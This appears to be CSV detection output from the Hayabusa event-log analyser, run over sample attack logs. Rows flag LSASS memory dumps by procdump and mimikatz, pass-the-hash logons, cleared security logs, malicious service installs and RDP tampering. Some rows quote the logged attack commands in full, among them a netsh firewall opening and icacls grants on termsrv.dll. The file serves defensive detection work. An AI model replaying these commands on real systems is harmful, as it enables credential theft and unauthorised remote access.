0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.522 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-03-03 09:20:28.621 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 09:20:28.621 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 09:20:28.621 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolfool | Path: cmd.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 09:24:24.699 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 09:24:24.699 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-03 09:24:24.699 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolsv | Path: cmd.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-17 19:09:41.328 +00:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\procdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1856 | Src PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:09:41.328 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.exe_190317_120941.dmp | Process: C:\Users\IEUser\Desktop\procdump.exe | PID: 1856 | PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:09:41.328 +00:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/file_event_win_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:09:41.328 +00:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:09:41.328 +00:00,PC04.example.corp,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:10:03.991 +00:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Windows\system32\taskmgr.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3576 | Src PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:10:03.991 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\lsass (2).DMP | Process: C:\Windows\system32\taskmgr.exe | PID: 3576 | PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:10:03.991 +00:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/file_event_win_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:10:03.991 +00:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx +2019-03-17 19:26:42.116 +00:00,PC04.example.corp,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx +2019-03-17 19:37:11.661 +00:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\mimikatz_trunk\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 3588 | Src PGUID: 365ABB72-A1E3-5C8E-0000-0010CEF72200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-17 19:37:11.661 +00:00,PC04.example.corp,10,medium,CredAccess,Rare GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_rare_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx +2019-03-17 20:17:44.537 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\install.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:44.637 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPCheck.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:44.637 +00:00,PC04.example.corp,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:44.797 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPConf.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:44.797 +00:00,PC04.example.corp,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:45.478 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPWInst.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:45.478 +00:00,PC04.example.corp,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:45.628 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\uninstall.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:45.648 +00:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\update.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:52.949 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | Process: C:\Windows\System32\cmd.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 3272 | PGUID: 365ABB72-AB70-5C8E-0000-0010781D0A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:52.979 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | Process: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe | User: PC04\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | LID: 0x3c004 | PID: 3700 | PGUID: 365ABB72-AB70-5C8E-0000-0010DF1F0A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:17:52.979 +00:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:05.086 +00:00,PC04.example.corp,13,medium,Persis | PrivEsc,ServiceDll Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_set_servicedll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:05.086 +00:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,rules/sigma/registry_sysmon/registry_set/registry_set_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:09.282 +00:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,rules/sigma/registry_sysmon/registry_set/registry_set_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:09.282 +00:00,PC04.example.corp,13,high,Evas,RDP Registry Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:09.312 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow | Process: C:\Windows\System32\netsh.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | LID: 0x3c004 | PID: 3696 | PGUID: 365ABB72-AB81-5C8E-0000-001024960C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:09.312 +00:00,PC04.example.corp,1,medium,Evas,Netsh Port or Application Allowed,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:09.312 +00:00,PC04.example.corp,1,high,Evas,Netsh RDP Port Opening,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:09.643 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3892 | PGUID: 365ABB72-AB81-5C8E-0000-00102E9E0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:18:12.096 +00:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 600 | PGUID: 365ABB72-AB84-5C8E-0000-00109EAD0C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:14.512 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | Process: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 4024 | PGUID: 365ABB72-ABFE-5C8E-0000-00105A560D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:14.512 +00:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:17.907 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\takeown.exe"" /f C:\Windows\System32\termsrv.dll | Process: C:\Windows\System32\takeown.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3708 | PGUID: 365ABB72-AC01-5C8E-0000-001011690D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:17.917 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant %%username%%:F | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3536 | PGUID: 365ABB72-AC01-5C8E-0000-0010296C0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:17.917 +00:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,rules/sigma/process_creation_sysmon/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:17.927 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\icacls.exe"" C:\Windows\System32\termsrv.dll /grant *S-1-1-0:(F) | Process: C:\Windows\System32\icacls.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | LID: 0x3c004 | PID: 3652 | PGUID: 365ABB72-AC01-5C8E-0000-0010656E0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:20:17.927 +00:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,rules/sigma/process_creation_sysmon/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:22:59.399 +00:00,PC04.example.corp,13,high,Persis,Changing RDP Port to Non Standard Number,,rules/sigma/registry_sysmon/registry_set/registry_set_change_rdp_port.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:23:12.188 +00:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 2972 | PGUID: 365ABB72-ACB0-5C8E-0000-001085D50D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-17 20:43:12.784 +00:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 136 | PGUID: 365ABB72-B160-5C8E-0000-0010253D1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-17 20:43:16.309 +00:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3312 | PGUID: 365ABB72-B164-5C8E-0000-0010543F1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 11:06:25.485 +00:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 11:06:29.911 +00:00,PC01.example.corp,4624,info,,Logon Type 9 - NewCredentials,User: user01 | Computer: | IP Addr: ::1 | LID: 0x4530f0f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 11:06:29.911 +00:00,PC01.example.corp,4672,info,,Admin Logon,User: user01 | LID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 11:06:29.911 +00:00,PC01.example.corp,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 11:06:29.911 +00:00,PC01.example.corp,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 11:27:00.438 +00:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 11:27:23.231 +00:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: user01 | Target User: administrator | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 11:27:23.261 +00:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 11:27:23.261 +00:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 11:27:23.271 +00:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 11:27:23.271 +00:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit 